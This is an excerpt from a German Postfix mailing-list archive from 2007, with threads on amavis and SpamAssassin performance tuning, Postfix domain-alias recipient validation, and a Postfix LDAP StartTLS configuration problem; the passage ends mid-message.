<4739AB6B.5010606@rprengel.de> References: <4738764D.1020506@rprengel.de><473896A0.1040602@japantest.homelinux.com> <4739AB6B.5010606@rprengel.de> Message-ID: <000b01c82601$8e4bbc50$0565a8c0@uwe> rprengel schrieb: > Parallel dazu habe ich das virtuelle System in dem der Server > läuft mal > gewartet. > Platten mittels VMware defragmentiert und von IDE auf SCSI migriert. ich hab jetzt nicht alles verfolgt ? IDE gegen SCSI getauscht? was rennt da überhaupt an Hardware? Speicher, HD, Proz, Raid ? Was läuft da ansonsten noch auf dem Server und wie ist Auslastung der anderen Dienste? Amavis mal in den Ramspeicher verlegt? (sollte das meiste bringen, normal große Mails werden bei mir unter 1 sec gescannt) Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From m.muenz at spam-fetish.org Tue Nov 13 15:59:55 2007 From: m.muenz at spam-fetish.org (Muenz, Michael) Date: Tue, 13 Nov 2007 15:59:55 +0100 Subject: [Postfixbuch-users] amavis Performance zur zeit mieserabel In-Reply-To: <4739AB6B.5010606@rprengel.de> References: <4738764D.1020506@rprengel.de> <473896A0.1040602@japantest.homelinux.com> <4739AB6B.5010606@rprengel.de> Message-ID: <4739BBEB.9010803@spam-fetish.org> rprengel schrieb: > Wie kann ich erkennen welche RBL ich nutze? tcpdump -n -s 0 port 53 Dann muss nur noch ne Mail reinkommen ... Michael From postfixbuch-users at japantest.homelinux.com Tue Nov 13 16:04:20 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Tue, 13 Nov 2007 16:04:20 +0100 Subject: [Postfixbuch-users] amavis Performance zur zeit mieserabel In-Reply-To: <4739AB6B.5010606@rprengel.de> References: <4738764D.1020506@rprengel.de> <473896A0.1040602@japantest.homelinux.com> <4739AB6B.5010606@rprengel.de> Message-ID: <4739BCF4.7070400@japantest.homelinux.com> rprengel wrote: > Sandy Drobic wrote: > abe die Durchlaufzeit zumindestens halbiert. >> Setze den Loglevel von Amavisd-new hoch und stelle zuerst einmal fest, an >> welcher Stelle (Virenscan oder Spamscan) die Zeit hauptsächlich gefressen >> wird. Wenn du z.B. noch alte RBLs in Spamassassin aufrufst, die in einem >> Timeout enden, dann würde mich das nicht wundern. >> >> Welcher Stand ist SA und Amavisd-new? >> > > amavisd-new-2.3.3 > spamassasin-3-1.8-9-2 Ziemlich alt für eine Antispam-Kombination. Aber mit SA 3.1.x solltest du schon sa-update durchführen können, um die Muster von SA zu aktualisieren. > Wie kann ich erkennen welche RBL ich nutze? Grins, ich erkenne es meistens daran, dass im Logbericht Timeouts erscheinen beim Zugriff auf einen DNS-Server bzw. eine RBL. > Ausserdem direkt die Frage ob und wie man die Spamdatenbank ggf. mal > optimieren kann. Vielleicht ist da ja auch was schief und bremst aus. Wie bereits erwähnt, warum spekulieren, wenn man es SEHEN kann? In etc/amavisd.conf den Loglevel von 0 auf 2 setzen, dass sollte reichen. Nov 13 15:57:34 katgar amavis[6512]: (06512-02) TIMING [total 9848 ms] - SMTP greeting: 4 (0%)0, SMTP EHLO: 0 (0%)0, SMTP pre-MAIL: 4 (0%)0, SMTP pre-DATA-flush: 8 (0%)0, SMTP DATA: 292 (3%)3, check_init: 4 (0%)3, digest_hdr: 0 (0%)3, digest_body: 0 (0%)3, gen_mail_id: 4 (0%)3, mime_decode: 68 (1%)4, get-file-type3: 36 (0%)4, decompose_part: 0 (0%)4, decompose_part: 4 (0%)4, parts_decode: 0 (0%)4, check_header: 8 (0%)4, AV-scan-1: 7072 (72%)76, spam-wb-list: 8 (0%)76, SA msg read: 0 (0%)76, SA parse: 20 (0%)76, SA check: 2056 (21%)97, update_cache: 24 (0%)98, decide_mail_destiny: 4 (0%)98, fwd-connect: 60 (1%)98, fwd-xforward: 4 (0%)98, fwd-mail-pip: 24 (0%)99, fwd-rcpt-pip: 0 (0%)99, fwd-data-chkpnt: 0 (0%)99, write-header: 8 (0%)99, fwd-data-contents: 0 (0%)99, fwd-end-chkpnt: 96 (1%)100, prepare-dsn: 0 (0%)100, main_log_entry: 28 (0%)100, update_snmp: 8 (0%)100, SMTP pre-response: 0 (0%)100, SMTP response: 4 (0%)100, unlink-3-files: 0 (0%)100, rundown: 0 (0%)100 Bei mit wäre also der Antivirus in erster Linie verbesserungswürdig. SA kommt mit den SA checks an zweiter Stelle. > Parallel dazu habe ich das virtuelle System in dem der Server läuft mal > gewartet. > Platten mittels VMware defragmentiert und von IDE auf SCSI migriert. > Das hat auch schon einiges gebracht. > Es sieht so aus als gäbe es nicht eine entscheidende Ursache sondern > eine Summe diverser "Pflegemängel". Das ist meistens so, aber eine Analyse, wo nun die meiste Zeit mit verbracht wird, ist sehr ratsam. Bei einem VMWare-Server sollte natürlich die VM möglichst ganz im RAM untergebracht sein (kein Swapping des Hostsystems). Die Plattenleistung und die Aktivierung der CPU-Unterstützung für Virtualisierung bring auch noch einmal eine Menge. -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From ralf.prengel at rprengel.de Tue Nov 13 17:18:06 2007 From: ralf.prengel at rprengel.de (rprengel) Date: Tue, 13 Nov 2007 17:18:06 +0100 Subject: [Postfixbuch-users] amavis Performance zur zeit mieserabel In-Reply-To: <000b01c82601$8e4bbc50$0565a8c0@uwe> References: <4738764D.1020506@rprengel.de><473896A0.1040602@japantest.homelinux.com> <4739AB6B.5010606@rprengel.de> <000b01c82601$8e4bbc50$0565a8c0@uwe> Message-ID: <4739CE3E.70204@rprengel.de> Uwe Driessen wrote: > rprengel schrieb: > >> Parallel dazu habe ich das virtuelle System in dem der Server >> läuft mal >> gewartet. >> Platten mittels VMware defragmentiert und von IDE auf SCSI migriert. > > ich hab jetzt nicht alles verfolgt > ? IDE gegen SCSI getauscht? Es ist einen VMware-Machine die bisher mit einer virtuellen IDE-Platte lief. > > was rennt da überhaupt an Hardware? > Speicher, HD, Proz, Raid ? > Was läuft da ansonsten noch auf dem Server und wie ist Auslastung der anderen Dienste? Die Vmware ist exclusiv für den Mailserver gebaut. 1 GB Ram auf einer aktuellen AMD 64 Bit CPU sollten für ein Hobbysystem reichen. > > Amavis mal in den Ramspeicher verlegt? (sollte das meiste bringen, normal große Mails > werden bei mir unter 1 sec gescannt) Das werde ich noch machen. Gruß From peter.bauernfeind at reba-eno.de Tue Nov 13 17:26:37 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Tue, 13 Nov 2007 17:26:37 +0100 Subject: [Postfixbuch-users] amavis Performance zur zeit mieserabel In-Reply-To: <4739CE3E.70204@rprengel.de> References: <4738764D.1020506@rprengel.de><473896A0.1040602@japantest.homelinux.com> <4739AB6B.5010606@rprengel.de> <000b01c82601$8e4bbc50$0565a8c0@uwe> <4739CE3E.70204@rprengel.de> Message-ID: <4739D03D.5060100@reba-eno.de> rprengel schrieb: > Die Vmware ist exclusiv für den Mailserver gebaut. > 1 GB Ram auf einer aktuellen AMD 64 Bit CPU sollten für ein Hobbysystem > reichen. > Nur so aus Neugierde, warum hast du eine VM für dem Mailserver? Kann der Mailserver nicht direkt auf der Maschine laufen? Eine VM kostet doch auch Leistung. Mit freundlichem Gruß Peter Bauernfeind From ralf.prengel at rprengel.de Tue Nov 13 17:30:34 2007 From: ralf.prengel at rprengel.de (rprengel) Date: Tue, 13 Nov 2007 17:30:34 +0100 Subject: [Postfixbuch-users] amavis Performance zur zeit mieserabel In-Reply-To: <4739BCF4.7070400@japantest.homelinux.com> References: <4738764D.1020506@rprengel.de> <473896A0.1040602@japantest.homelinux.com> <4739AB6B.5010606@rprengel.de> <4739BCF4.7070400@japantest.homelinux.com> Message-ID: <4739D12A.6090409@rprengel.de> Sandy Drobic wrote: > rprengel wrote: >> Sandy Drobic wrote: >> abe die Durchlaufzeit zumindestens halbiert. >>> Setze den Loglevel von Amavisd-new hoch und stelle zuerst einmal fest, an >>> welcher Stelle (Virenscan oder Spamscan) die Zeit hauptsächlich gefressen >>> wird. Wenn du z.B. noch alte RBLs in Spamassassin aufrufst, die in einem >>> Timeout enden, dann würde mich das nicht wundern. >>> >>> Welcher Stand ist SA und Amavisd-new? >>> >> amavisd-new-2.3.3 >> spamassasin-3-1.8-9-2 Halt das Suse für 10.1 liefert. > > Ziemlich alt für eine Antispam-Kombination. Aber mit SA 3.1.x solltest du > schon sa-update durchführen können, um die Muster von SA zu aktualisieren. > >> Wie kann ich erkennen welche RBL ich nutze? > > Grins, ich erkenne es meistens daran, dass im Logbericht Timeouts > erscheinen beim Zugriff auf einen DNS-Server bzw. eine RBL. ok grep ich mal durch > >> Ausserdem direkt die Frage ob und wie man die Spamdatenbank ggf. mal >> optimieren kann. Vielleicht ist da ja auch was schief und bremst aus. > > Wie bereits erwähnt, warum spekulieren, wenn man es SEHEN kann? > In etc/amavisd.conf den Loglevel von 0 auf 2 setzen, dass sollte reichen. > > Nov 13 15:57:34 katgar amavis[6512]: (06512-02) TIMING [total 9848 ms] - > SMTP greeting: 4 (0%)0, SMTP EHLO: 0 (0%)0, SMTP pre-MAIL: 4 (0%)0, SMTP > pre-DATA-flush: 8 (0%)0, SMTP DATA: 292 (3%)3, check_init: 4 (0%)3, > digest_hdr: 0 (0%)3, digest_body: 0 (0%)3, gen_mail_id: 4 (0%)3, > mime_decode: 68 (1%)4, get-file-type3: 36 (0%)4, decompose_part: 0 (0%)4, > decompose_part: 4 (0%)4, parts_decode: 0 (0%)4, check_header: 8 (0%)4, > AV-scan-1: 7072 (72%)76, spam-wb-list: 8 (0%)76, SA msg read: 0 (0%)76, SA > parse: 20 (0%)76, SA check: 2056 (21%)97, update_cache: 24 (0%)98, > decide_mail_destiny: 4 (0%)98, fwd-connect: 60 (1%)98, fwd-xforward: 4 > (0%)98, fwd-mail-pip: 24 (0%)99, fwd-rcpt-pip: 0 (0%)99, fwd-data-chkpnt: > 0 (0%)99, write-header: 8 (0%)99, fwd-data-contents: 0 (0%)99, > fwd-end-chkpnt: 96 (1%)100, prepare-dsn: 0 (0%)100, main_log_entry: 28 > (0%)100, update_snmp: 8 (0%)100, SMTP pre-response: 0 (0%)100, SMTP > response: 4 (0%)100, unlink-3-files: 0 (0%)100, rundown: 0 (0%)100 > > Bei mit wäre also der Antivirus in erster Linie verbesserungswürdig. SA > kommt mit den SA checks an zweiter Stelle. SA check = 50 % bei mir Scanner bei 26 % Der Durchsatz ist jetzt aber schon deutlich besser > Das ist meistens so, aber eine Analyse, wo nun die meiste Zeit mit > verbracht wird, ist sehr ratsam. Bei einem VMWare-Server sollte natürlich > die VM möglichst ganz im RAM untergebracht sein (kein Swapping des > Hostsystems). Die Plattenleistung und die Aktivierung der > CPU-Unterstützung für Virtualisierung bring auch noch einmal eine Menge. Yeap, allerdings bin ich da mit einem VMware-Server etwas limitierter als mit ESX aber ich denke ich habe schon einige Bremsen gelöst. Gruß From ralf.prengel at rprengel.de Tue Nov 13 17:38:42 2007 From: ralf.prengel at rprengel.de (rprengel) Date: Tue, 13 Nov 2007 17:38:42 +0100 Subject: [Postfixbuch-users] amavis Performance zur zeit mieserabel In-Reply-To: <4739D03D.5060100@reba-eno.de> References: <4738764D.1020506@rprengel.de><473896A0.1040602@japantest.homelinux.com> <4739AB6B.5010606@rprengel.de> <000b01c82601$8e4bbc50$0565a8c0@uwe> <4739CE3E.70204@rprengel.de> <4739D03D.5060100@reba-eno.de> Message-ID: <4739D312.50607@rprengel.de> Peter Bauernfeind wrote: > rprengel schrieb: >> Die Vmware ist exclusiv für den Mailserver gebaut. >> 1 GB Ram auf einer aktuellen AMD 64 Bit CPU sollten für ein Hobbysystem >> reichen. >> > > Nur so aus Neugierde, warum hast du eine VM für dem Mailserver? Kann der > Mailserver nicht direkt auf der Maschine laufen? Eine VM kostet doch > auch Leistung. > Der Verlust ist minimal mit einem Linux-Hostsystem und die Migration von meinem alten Host zum neuen Hostsystem dauerte genau so lange wie es dauerte per SCP das komplette Verzeichniss von Rechner A nach Rechner B zu kopieren. Abgesehen davon kann man vor größeren Aktionen schnell mal ein komplettes Backup erstellen das ganz schnell aktiviert werden kann. Gruß From mluser at rbmail.ch Tue Nov 13 18:05:52 2007 From: mluser at rbmail.ch (Andre Keller) Date: Tue, 13 Nov 2007 18:05:52 +0100 Subject: [Postfixbuch-users] Domain Alias Message-ID: <4739D970.3030403@rbmail.ch> Hi zusammen kurze Frage (das hoffe ich zumindest ;-) Ich habe eine Virtual Domain mit einigen Usern: user1 at mydomain.tld user2 at mydomain.tld ... Jetzt habe ich auch noch eine zweite Domain welche als Alias konfiguriert werden soll: user1 at myotherdomain.tld -> user1 at mydomain.tld user2 at myotherdomain.tld -> user2 at mydomain.tld ... Ich habe hier im Listenarchiv gelesen, dass dies mit einer hash map @myotherdomain.tld @mydomain.tld erledigt werden könnte. Mein Problem: Diese Map liefert doch auch den entsprechenden user zurück, wenn dieser in mydomain.tld nicht gelistet ist. Täusche ich mich da? Wenn nicht, wie kann ich die Aufgabe am besten lösen? Gruss André From mluser at rbmail.ch Tue Nov 13 19:25:00 2007 From: mluser at rbmail.ch (Andre Keller) Date: Tue, 13 Nov 2007 19:25:00 +0100 Subject: [Postfixbuch-users] Domain Alias In-Reply-To: <4739D970.3030403@rbmail.ch> References: <4739D970.3030403@rbmail.ch> Message-ID: <4739EBFC.5040006@rbmail.ch> > Mein Problem: Diese Map liefert doch auch den entsprechenden user > zurück, wenn dieser in mydomain.tld nicht gelistet ist. Täusche ich mich > da? Wenn nicht, wie kann ich die Aufgabe am besten lösen? > Hab das jetzt mal in einer vm getestet. Er liefert im Dialog of rcpt to: ein 250... Danach bounced er die mail mit folgenden Inhalt > (expanded from ): user unknown Dies ist nicht so schön... Es die einzige Variante für mein Anliegen eine map zu generieren welche alle gültigen benutzer beinhaltet? From cite at incertum.net Tue Nov 13 20:49:23 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Tue, 13 Nov 2007 20:49:23 +0100 Subject: [Postfixbuch-users] Domain Alias In-Reply-To: <4739EBFC.5040006@rbmail.ch> References: <4739D970.3030403@rbmail.ch> <4739EBFC.5040006@rbmail.ch> Message-ID: <20071113194923.GQ7087@mail.incertum.net> * Andre Keller wrote: > Hab das jetzt mal in einer vm getestet. Er liefert im Dialog of rcpt to: > ein 250... > > Danach bounced er die mail mit folgenden Inhalt > > > (expanded from > ): user unknown > > Dies ist nicht so schön... > > Es die einzige Variante für mein Anliegen eine map zu generieren welche > alle gültigen benutzer beinhaltet? Wietse empfiehlt auf der englischen ML explizit, solche Alias-Mechanismen der Form "@domain1 @domain2" zu unterlassen, weil sie eben die Recipient Validation kaputt machen, von daher würde ich sagen: Es geht nicht anders. In welchem Format liegen die gültigen Empfänger denn vor? So eine Duplikation ist doch fast immer trivial... Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #261: Imperative Programmierung - Die meisten Menschen sind nunmal aber daran gewöhnt, einen Vorgang in einzelne Anweisungen aufzuteilen (Geh in Küche, Öffne Kühlschrank, Nimm Pizza, ...) (Daniel Fischer) From mluser at rbmail.ch Tue Nov 13 20:54:51 2007 From: mluser at rbmail.ch (Andre Keller) Date: Tue, 13 Nov 2007 20:54:51 +0100 Subject: [Postfixbuch-users] Domain Alias In-Reply-To: <20071113194923.GQ7087@mail.incertum.net> References: <4739D970.3030403@rbmail.ch> <4739EBFC.5040006@rbmail.ch> <20071113194923.GQ7087@mail.incertum.net> Message-ID: <473A010B.4000203@rbmail.ch> Stefan Förster schrieb: > Danke für die Antwort > Wietse empfiehlt auf der englischen ML explizit, solche > Alias-Mechanismen der Form "@domain1 @domain2" zu unterlassen, weil > sie eben die Recipient Validation kaputt machen, von daher würde ich > sagen: Es geht nicht anders. > > In welchem Format liegen die gültigen Empfänger denn vor? So eine > Duplikation ist doch fast immer trivial... > Ja ist kein Problem, liegen in einer sql datenbank... Hat mich nur interessiert ob es da eine einfachere lösung gibt... > > Ciao > Stefan From christian at bricart.de Tue Nov 13 22:57:31 2007 From: christian at bricart.de (Christian Bricart) Date: Tue, 13 Nov 2007 22:57:31 +0100 Subject: [Postfixbuch-users] Domain Alias In-Reply-To: <473A010B.4000203@rbmail.ch> References: <4739D970.3030403@rbmail.ch> <4739EBFC.5040006@rbmail.ch> <20071113194923.GQ7087@mail.incertum.net> <473A010B.4000203@rbmail.ch> Message-ID: <473A1DCB.2000306@bricart.de> Andre Keller wrote: > Stefan Förster schrieb: > Danke für die Antwort > >> Wietse empfiehlt auf der englischen ML explizit, solche >> Alias-Mechanismen der Form "@domain1 @domain2" zu unterlassen, weil >> sie eben die Recipient Validation kaputt machen, von daher würde ich >> sagen: Es geht nicht anders. >> >> In welchem Format liegen die gültigen Empfänger denn vor? So eine >> Duplikation ist doch fast immer trivial... >> > > Ja ist kein Problem, liegen in einer sql datenbank... Hat mich nur > interessiert ob es da eine einfachere lösung gibt... hmm .. ich hab das über nen regexp-rewrite gemacht: virtual_alias_maps = regexp:/etc/postfix/virtual-regexp hash:/etc/postfix/virtual ... mit /etc/postfix/virtual-regexp: /^(.+)@example\.com$/ $1 at example.net Dann geht jede weitere Überprüfung immer auf gültige Adressen in example.net... Und ungültige Adressen liefern korrekte Rejects, wenn @example.net nicht existiert... oder übersehe _ich_ jetzt was? Christian From postfixbuch-users at japantest.homelinux.com Tue Nov 13 23:51:25 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Tue, 13 Nov 2007 23:51:25 +0100 Subject: [Postfixbuch-users] Domain Alias In-Reply-To: <473A1DCB.2000306@bricart.de> References: <4739D970.3030403@rbmail.ch> <4739EBFC.5040006@rbmail.ch> <20071113194923.GQ7087@mail.incertum.net> <473A010B.4000203@rbmail.ch> <473A1DCB.2000306@bricart.de> Message-ID: <473A2A6D.3010408@japantest.homelinux.com> Christian Bricart wrote: > Andre Keller wrote: >> Stefan Förster schrieb: >> Danke für die Antwort >> >>> Wietse empfiehlt auf der englischen ML explizit, solche >>> Alias-Mechanismen der Form "@domain1 @domain2" zu unterlassen, weil >>> sie eben die Recipient Validation kaputt machen, von daher würde ich >>> sagen: Es geht nicht anders. >>> >>> In welchem Format liegen die gültigen Empfänger denn vor? So eine >>> Duplikation ist doch fast immer trivial... >>> >> Ja ist kein Problem, liegen in einer sql datenbank... Hat mich nur >> interessiert ob es da eine einfachere lösung gibt... > > hmm .. ich hab das über nen regexp-rewrite gemacht: > > virtual_alias_maps = > regexp:/etc/postfix/virtual-regexp > hash:/etc/postfix/virtual > ... > > mit /etc/postfix/virtual-regexp: > /^(.+)@example\.com$/ $1 at example.net > > Dann geht jede weitere Überprüfung immer auf gültige Adressen in > example.net... > Und ungültige Adressen liefern korrekte Rejects, wenn @example.net > nicht existiert... > > oder übersehe _ich_ jetzt was? Ich kann mir nicht vorstellen, dass dies tatsächlich funktioniert. Die Empfängervalidierung arbeitet nicht rekursiv, und damit wird der Empfänger als gültig angesehen, wenn die Tabelle ein Ergebnis zurückliefert. In deinem Beispiel wird für jede nicht-leere Adresse von example.com ein Ergebnis zurückgeliefert. Hast du einfach mal einen Telnet-Test gemacht bis zum RCPT TO? -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From lindt at gmx-topmail.de Wed Nov 14 08:56:53 2007 From: lindt at gmx-topmail.de (lindt at gmx-topmail.de) Date: Wed, 14 Nov 2007 08:56:53 +0100 Subject: [Postfixbuch-users] amavis Performance zur zeit mieserabel In-Reply-To: <4739D312.50607@rprengel.de> References: <4738764D.1020506@rprengel.de><473896A0.1040602@japantest.homelinux.com> <4739AB6B.5010606@rprengel.de> <000b01c82601$8e4bbc50$0565a8c0@uwe> <4739CE3E.70204@rprengel.de> <4739D03D.5060100@reba-eno.de> <4739D312.50607@rprengel.de> Message-ID: <20071114075653.271570@gmx.net> > Peter Bauernfeind wrote: > > rprengel schrieb: > >> Die Vmware ist exclusiv für den Mailserver gebaut. > >> 1 GB Ram auf einer aktuellen AMD 64 Bit CPU sollten für ein > Hobbysystem > >> reichen. > >> > > > > Nur so aus Neugierde, warum hast du eine VM für dem Mailserver? Kann > der > > Mailserver nicht direkt auf der Maschine laufen? Eine VM kostet doch > > auch Leistung. > > > Der Verlust ist minimal mit einem Linux-Hostsystem und die Migration von > meinem alten Host zum neuen Hostsystem dauerte genau so lange wie es > dauerte per SCP das komplette Verzeichniss von Rechner A nach Rechner B > zu kopieren. > Abgesehen davon kann man vor größeren Aktionen schnell mal ein > komplettes Backup erstellen das ganz schnell aktiviert werden kann. > > Gruß > Moin, ich hatte mal ein ähnliches Problem bei meinen umstieg von 2.4.24 auf 2.6.16. Danach war das System vor allem amavis und spamd extrem langsam. Wie sieht deine Kernel .config aus? Bei 1GB Ram scheint der Kernel ab und an Probleme zu haben. Probier mal append = "mem=900M" beim booten oder halt in die lilo.conf http://www.vmware.com/support/ws55/doc/ws_performance_mem_gigoram_linux.html -- Psssst! Schon vom neuen GMX MultiMessenger gehört? Der kann`s mit allen: http://www.gmx.net/de/go/multimessenger From christian at bricart.de Wed Nov 14 09:33:46 2007 From: christian at bricart.de (Christian Bricart) Date: Wed, 14 Nov 2007 09:33:46 +0100 (CET) Subject: [Postfixbuch-users] amavis Performance zur zeit mieserabel In-Reply-To: <20071114075653.271570@gmx.net> References: <4738764D.1020506@rprengel.de><473896A0.1040602@japantest.homelinux.com> <4739AB6B.5010606@rprengel.de> <000b01c82601$8e4bbc50$0565a8c0@uwe> <4739CE3E.70204@rprengel.de> <4739D03D.5060100@reba-eno.de> <4739D312.50607@rprengel.de> <20071114075653.271570@gmx.net> Message-ID: <37656.80.87.162.117.1195029226.squirrel@aachalon.de> lindt at gmx-topmail.de wrote: > > http://www.vmware.com/support/ws55/doc/ws_performance_mem_gigoram_linux.html Aehm - mit Verlaub... das Dokument bezieht sich auf Probleme bei Kernel 2.2.x mit Speichergrössen grösser-gleich 1GB...(was bei der MM-Architektur vom 2.2er Kernel nur verständlich ist..) Der Tipp dort ist, dass man bitte doch auf 2.4er Kernel updaten soll. Das System des OP ist wie gesagt eine Schmuse-Linux 10.1 - und die hat sogar 2.6er Kernel.. Christian (CLOSED - NOTABUG) From lindt at gmx-topmail.de Wed Nov 14 09:50:26 2007 From: lindt at gmx-topmail.de (lindt at gmx-topmail.de) Date: Wed, 14 Nov 2007 09:50:26 +0100 Subject: [Postfixbuch-users] amavis Performance zur zeit mieserabel In-Reply-To: <37656.80.87.162.117.1195029226.squirrel@aachalon.de> References: <4738764D.1020506@rprengel.de><473896A0.1040602@japantest.homelinux.com> <4739AB6B.5010606@rprengel.de> <000b01c82601$8e4bbc50$0565a8c0@uwe> <4739CE3E.70204@rprengel.de> <4739D03D.5060100@reba-eno.de> <4739D312.50607@rprengel.de> <20071114075653.271570@gmx.net> <37656.80.87.162.117.1195029226.squirrel@aachalon.de> Message-ID: <20071114085026.320880@gmx.net> http://www.vmware.com/support/ws55/doc/ws_performance_mem_gigoram_linux.html > > Aehm - mit Verlaub... das Dokument bezieht sich auf Probleme bei Kernel > 2.2.x mit Speichergrössen grösser-gleich 1GB...(was bei der > MM-Architektur > vom 2.2er Kernel nur verständlich ist..) > Der Tipp dort ist, dass man bitte doch auf 2.4er Kernel updaten soll. > > Das System des OP ist wie gesagt eine Schmuse-Linux 10.1 - und die hat > sogar 2.6er Kernel.. > > Christian (CLOSED - NOTABUG) damit wollte ich nur zeigen das es da mal was gab. heißt ja nicht das mit 2.6.XX-X nun alles perfekt läuft!!! Das ist ein Grundsätzliches Problem. Hat nichts mit der Kernel Version zu tun! Stichtwort HIGHMEM. tritt auch noch mit falscher Config bei 2.6.22-9 auf! hat da bei einer kiste wie gesagt auch geholfen! -- Ist Ihr Browser Vista-kompatibel? Jetzt die neuesten Browser-Versionen downloaden: http://www.gmx.net/de/go/browser From christian at bricart.de Wed Nov 14 14:20:16 2007 From: christian at bricart.de (Christian Bricart) Date: Wed, 14 Nov 2007 14:20:16 +0100 (CET) Subject: [Postfixbuch-users] Domain Alias In-Reply-To: <473A2A6D.3010408@japantest.homelinux.com> References: <4739D970.3030403@rbmail.ch> <4739EBFC.5040006@rbmail.ch> <20071113194923.GQ7087@mail.incertum.net> <473A010B.4000203@rbmail.ch> <473A1DCB.2000306@bricart.de> <473A2A6D.3010408@japantest.homelinux.com> Message-ID: <60190.80.87.162.117.1195046416.squirrel@aachalon.de> Sandy Drobic wrote: > Christian Bricart wrote: > .. >> hmm .. ich hab das über nen regexp-rewrite gemacht: >> >> virtual_alias_maps = >> regexp:/etc/postfix/virtual-regexp >> hash:/etc/postfix/virtual >> ... >> >> mit /etc/postfix/virtual-regexp: >> /^(.+)@example\.com$/ $1 at example.net >> >> Dann geht jede weitere Überprüfung immer auf gültige Adressen in >> example.net... >> Und ungültige Adressen liefern korrekte Rejects, wenn @example.net >> nicht existiert... >> >> oder übersehe _ich_ jetzt was? > > Ich kann mir nicht vorstellen, dass dies tatsächlich funktioniert. Die > Empfängervalidierung arbeitet nicht rekursiv, und damit wird der Empfänger > als gültig angesehen, wenn die Tabelle ein Ergebnis zurückliefert. > In deinem Beispiel wird für jede nicht-leere Adresse von example.com ein > Ergebnis zurückgeliefert. Ich war bis dato davon ausgegangen, dass die regex-Table intern umschreibt, und dann mit der "rechten Seite" weitermacht. Aber wenn man drüber nachdenkt, was da steht... nämlich virtual_alias_MAPS.. dann kann es gar nicht anders sein ;-) die "linke Seite" liefert einen Lookup-Key für jegliche Adressen @example.com und damit einen validen Account... die echte Auswertung wohin genau nachher die Mail hingeht kommt dann ja erst später.. > > Hast du einfach mal einen Telnet-Test gemacht bis zum RCPT TO? Hmm - du hast recht... RCPT TO an jede beliebige Adresse @example.com liefert "250 Ok".. wobei dann die finale Auslieferung an den nichtexistenten Account @example.net bounced... *hüstel* Ok - ich fixe das dann mal ;-) Danke für den Hinweis Christian (wie gut, dass die anderen Domains, die das haben eh all Catch-All sind...) From werner at aloah-from-hell.de Wed Nov 14 14:36:29 2007 From: werner at aloah-from-hell.de (Werner Detter) Date: Wed, 14 Nov 2007 14:36:29 +0100 Subject: [Postfixbuch-users] Domain Alias In-Reply-To: <60190.80.87.162.117.1195046416.squirrel@aachalon.de> References: <4739D970.3030403@rbmail.ch> <4739EBFC.5040006@rbmail.ch> <20071113194923.GQ7087@mail.incertum.net> <473A010B.4000203@rbmail.ch> <473A1DCB.2000306@bricart.de> <473A2A6D.3010408@japantest.homelinux.com> <60190.80.87.162.117.1195046416.squirrel@aachalon.de> Message-ID: <473AF9DD.7040305@aloah-from-hell.de> > Danke für den Hinweis > Christian (wie gut, dass die anderen Domains, die das haben eh all > Catch-All sind...) Pfui, das ist eher schlecht. Werner From muecke at tyntec.biz Wed Nov 14 15:25:59 2007 From: muecke at tyntec.biz (=?ISO-8859-1?Q?Artur_M=FCcke?=) Date: Wed, 14 Nov 2007 15:25:59 +0100 Subject: [Postfixbuch-users] Postfix (Relay) LDAP | TLS Problem Message-ID: <473B0577.3060406@tyntec.biz> Moin Leute, ich habe ein kleines Problem mit Postfix und LDAP. Ich hab einen separaten Postfix-Server aufgesetzt, der lediglich als Viren-Spam-Filter funktioniert und die gecheckten Mails dann an den finalen Mailserver relayed. An welche Domains bzw. User die Mails weitergeleitet werden sollen, fragt der Postfix über LDAP ab. Mein Problem ist nun, dass ich die Verbindung zwischen Postfix und LDAP nicht über TLS hinbekomme. :-/ Hier mal die relevanten Config-Ausschnitte: ####### main.cf ####################################################### Code: relayhost = [10.3.4.234]:25 relay_domains = ldap:relay_domain relay_recipient_maps = ldap:relay_recipient ## RELAY - DOMAINS ## relay_domain_server_host = 10.3.5.195 relay_domain_server_port = 389 relay_domain_start_tls = yes relay_domain_tls_require_cert = no relay_domain_version = 3 relay_domain_bind = no relay_domain_search_base = ou=DNSObjects,ou=AdminObjects,ou=OxObjects,dc=ldap,dc=meinedomain,dc=biz relay_domain_query_filter = (domainName=%s) relay_domain_result_attribute = domainName ## RELAY RECIPIENTS ## relay_recipient_server_host = 10.3.5.195 relay_recipient_server_port = 389 relay_recipient_start_tls = yes relay_recipient_tls_require_cert = no relay_recipient_version = 3 relay_recipient_bind = no relay_recipient_search_base = ou=Users,ou=OxObjects,dc=ldap,dc=meinedomain,dc=biz relay_recipient_query_filter = (alias=%s) relay_recipient_result_attribute = alias ####################################################### ####### ldap.conf ##################################################### host 10.3.5.195 base dc=ldap,dc=meinedomain,dc=biz ssl start_tls TLS_CACERTDIR /etc/ldap/cacerts TLS_REQCERT never slapd.conf # Auf dem OpenLDAP-Server # TLS TLSCertificateFile /etc/ldap/certs/newcert.pem TLSCertificateKeyFile /etc/ldap/certs/ldapkey.pem TLSCACertificateFile /etc/ldap/certs/cacert.pem TLSVerifyClient never ####################################################### Mein Problem ist jetzt, dass meine config mit TLS nicht funktioniert. Ohne TLS funzt die LDAP-Anbindung von Postfix problemlos. Sobald ich TLS in der Postfix-Config aktiviere, funktioniert die Anbindung nicht mehr. In den Logs erscheinen die folgenden Fehlermeldungen: ####################################################################### postfix/master[3678]: warning: process /usr/lib/postfix/trivial-rewrite pid 3689 exit status 2 postfix/smtpd[3685]: warning: premature end-of-input on private/rewrite socket while reading input attribute name postfix/smtpd[3685]: warning: premature end-of-input on private/rewrite socket while reading input attribute name postfix/smtpd[3685]: warning: problem talking to service rewrite: Success postfix/master[3678]: warning: process /usr/lib/postfix/trivial-rewrite pid 3690 exit status 2 postfix/master[3678]: warning: /usr/lib/postfix/trivial-rewrite: bad command startup -- throttling postfix/smtpd[3685]: warning: premature end-of-input on private/rewrite socket while reading input attribute name postfix/smtpd[3685]: warning: problem talking to service rewrite: Success ####################################################################### Hab echt keine 